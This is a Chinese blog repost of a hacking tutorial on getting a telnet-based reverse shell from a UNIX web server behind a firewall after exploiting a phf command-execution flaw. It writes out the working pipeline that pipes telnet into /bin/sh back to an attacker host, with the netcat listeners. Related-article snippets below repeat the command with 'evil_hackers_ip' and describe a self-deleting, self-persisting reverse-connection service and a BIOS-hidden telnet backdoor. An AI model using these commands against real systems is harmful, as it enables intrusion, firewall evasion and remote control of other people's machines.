如何使用telnet进行反向连接

最新推荐文章于 2019-06-29 16:10:39 发布
最新推荐文章于 2019-06-29 16:10:39 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: [linux]

原文链接 http://www.91ri.org/7835.html

解决的思路有点意思,所以转过来

telnet反向连接在实战中的作用:

案例1:黑客试图获取某工业级数据包检测防火墙或者路由器之后(基于路由的防火墙,不代理任何服务)的一台UNIX的系统的WEB服务器的访问权。防火墙仅对外网开放了80及443,这台WEB服务器存在phf漏洞(phf漏洞是什么自行脑补),黑客可远程对该web服务器执行命令。此时就可以通过unix自带的telnet获取到一个交互式的SHELL。(91ri.org补充:因为之所以不用NC是因为服务器一般都有安装telnet,且很少受到限制。而connect又是从目标主机中发起,所以可以达到穿透防火墙及内网的作用。)

环境假设:

target ip : 192.168.128.105

hacker ip:192.168.128.100

telnet 反向连接命令:

target :

 

 /usr/bin/telnet 192.168.128.100 80 |/bin/sh |/usr/bin/telnet 192.168.128.100 25

 hacker:

 /opt/netcat/bin/nc -l -n -v -p 80 

 /opt/netcat/bin/nc -l -n -v -p 25

命令说明:实际上我们是将telnet连接到hacker的80端口的NC上,为了与传统的unix的输入输出机制保持一致,我们通过标准输出即键盘通过管道输给了Bourne shell。而由/bin/sh 执行命令的结果再通过管道输出telnet,并返回到hacker的25端口的NC上。

 

本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者,转载时带上版权信息。 详细内容请参考:http://www.91ri.org/7835.html

 

jhonguy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一个简单的反向连接服务程序
01-13
功能简介:运行后自删除,写注册表Run下,同时自拷贝到系统目录下,注册为系统服务SvrDemo,修改文件时间同Cmd.exe,每隔俩秒钟连接一次本地(127.0.0.1)的600端口,ip地址和端口可自行修改,部分代码来源于网上修改,主要在于演示服务程序,用fsg2.0加壳后9.8k,编译环境D7+2kPro在命令行下加参数 /U 可以卸载服务程序。
反向Telnet,Delphi实现【原创】
12-19
反向Telnet反向连接 2008年以前用Delphi 7 写的小工具 当时在矿山使用 了我们开发的系统软件,没有宽带,使用GPRS无线数据上传 当时是为了维护方便,写了这个小工具! 分服务器端(主控端——swServer.dpr)和...
反向telnet
the_owl的专栏
07-10 2007
反向telnet 路由器异步线路与Modem连接后,就可以建立与Modem的直接Telnet对话通信。这个过程也称为反向远程登录Telnet( reverse Telnet)。 反向远程登录的意思是经由异步线路启动Telnet对话,而不是接收传至线路的连接,即所谓的正向连接(forward connection)。 建立Modem的直接Telnet对话 Modem要建立
反向TELNET
xqhrs232的专栏
04-06 2682
原文地址::http://blog.sina.com.cn/s/blog_4a023ebb010005gc.html 相关文章 1、反向telnet配置 (留着自己以后用 呵呵)----http://blog.csdn.net/sorrowegg/article/details/5774147 2、反向Telnet  ----http://mzhehome.blog.163.co
反向telnet配置 (留着自己以后用 呵呵)
sorrowegg的专栏
07-29 1905
<br />dis ver                                                                         <br /> Copyright Notice:                                                              <br /> All rights reserved (Jul 18 2005).                                           
Reverse telnet设置
weixin_33772645的博客
11-29 435
Reverse telnet 又称为反向telnet,反远程登录,此处反的意思为从异步串行端口向外建立连接,与一般为外向内连接区别。使用模块NM-8A/16A或者SIC-8A/16A,下联八爪线,每个LINE对应于不同设备扩展口。相当于telnet 192.168.1.200 端口号 此处的端口号为2000+线路号,分别对应于console口号 teln...
反向telnet连接
weixin_33805992的博客
06-29 526
首先使用nc工具进行监听: nc -l -n -v -p 80 nv -l -n -v -p 25 然后: /bin/telnet evil_hackers_ip 80 | /bin/sh | /bin/sh | /bin/telnet evil_hackers_ip 25 转载于:https://www.cnblogs.com/zjfdlut/p/3381284.html...
反向telnet.rar
07-25
反向telnet cisco路由器支持进来(incoming)的异步线路连接(正向连接),也支持外出(outgoing)的异步线路连接反向telnet连接)。用户可以通过路由器反向telnet到其他设备上进行配置。
Mysql DNS反向解析导致连接超时过程分析(skip-name-resolve)
01-19
MySQL数据库收到一个网络连接后,首先拿到对方的IP地址,然后对这个IP地址进行反向DNS解析从而得到这个IP地址对应的主机名。用主机名在权限系统里面进行权限判断。反向DNS解析是耗费时间的,有可能让用户感觉起来很...
nc和telnet工具
10-10
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令"|"与重定向命令"、">"等等命令功能更强大......)。 6)作攻击程序用,...
telnet实现远程连接
热门推荐
z-xiaoyao
11-29 1万+
关于telnet我们可能还不是太熟悉,这是一个非常强大的命令,首先我们来看一下他的作用:    它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。    具体应该怎么做呢?      wondows
SSH的正向连接反向连接
蓝翔顶级电脑技工
11-14 2538
正向连接// 将中间主机可访问的主机的指定端口 镜像到本地指定端口 ssh -L 本地IP:本地端口:远程可访问IP:远程可访问IP的端口 root@中间主机案例: 公司为了安全配置了两台机器,一台可供外网访问[公司主机A]。另外一台不能外网访问[公司主机B],但可与[公司主机A]互连。现在我在遥远外地,我要取公司[主机B]的文件,但此时无人在公司。 但我有一台连接外网的[个人主机P],可以做
反向Telnet突破防火墙封锁
weixin_34345753的博客
11-14 237
反向Telnet可以用在当目标防火墙对端口全面封锁以后,我们可以通过此方法实现突破访问. 首先在Win下也就是攻击者的CMD下用NC分别监听80和25端口,这两个端口可以任意改变,只要目标防火墙没有禁止即可. 如图: 然后我们可以通过注入漏洞,OS命令执行漏洞或Webshell在目标机执行 telnet evilip 80|sh |telnet ...
Cisco路由器做反向Telnet做终端服务器
weixin_34273479的博客
09-28 545
Cisco路由器反向Telnet做终端服务器 Cisco路由器的异步串口支持反向Telnet,因此可以用这个功能将一台2509配置成终端服务器,连接实验环 境的其他Cisco设备,具体做法如下: 将Cisco 2509安装八爪鱼线缆,注意只安装线缆,不装DB25-RJ45转换器。将八爪鱼线缆RJ45一头插入其他Cisco设备的Console口。 然后配置这台2509:...
BIOS中隐藏Telnet后门
03-27 2750
文章属性:原创文章提交:cheng5103 (cheng_5103_at_126.com)[项目简述]     该项目仅为实验性项目,目的是学习国外技术。该项目主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受CMD控制。[关于作者]     姓名:成松林 QQ:179641795 Email:che
telnet命令详解
Metempsychosis_的专栏
06-27 3374
1、什么是Telnet?   对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。 2、Telnet被入侵者用来做什么   (1)Telnet是控制主机的第一手段
一种将程序的标准输出重定向到telnet终端的方法
ccsu_dog的专栏
09-29 4070
文章来源:http://blog.chinaunix.net/uid-23859284-id-5015284.html 在现场调试嵌入式设备时,很多时候我们是无法连接串口查看打印信息的,只可以通过网络连接telnet登陆到设备终端, 而此时是无法查看当前运行的应用程序的打印信息的,为我们排查问题带来了一定的困难。当然,我们可以通过gdb工具 attach进程进行调试,但这种方式还
使用go-cqhttp无法连接反向web socket universal服务器
最新发布
07-13
你好!很抱歉听到你无法连接反向 WebSocket 服务器。请确保你已经按照正确的方法进行了配置。下面是一些常见的解决方案: 1. 确认 go-cqhttp 的配置文件中 WebSocket 相关的参数是否正确设置。你需要指定反向 WebSocket 服务器的地址和端口号。 2. 检查你的反向 WebSocket 服务器是否正常运行,并且监听了正确的端口。你可以尝试通过 telnet 命令或网络工具来测试服务器是否可达。 3. 确保你的网络环境没有阻止 WebSocket 连接。有些防火墙或路由器可能会阻止 WebSocket 连接,请检查你的网络设置。 4. 如果你的反向 WebSocket 服务器使用了 SSL/TLS 加密,请确保你的 go-cqhttp 配置中已正确设置了证书和密钥文件路径。 如果以上方法都无法解决问题,你可以提供更多详细的错误信息或日志,以便我们更好地理解并帮助你解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值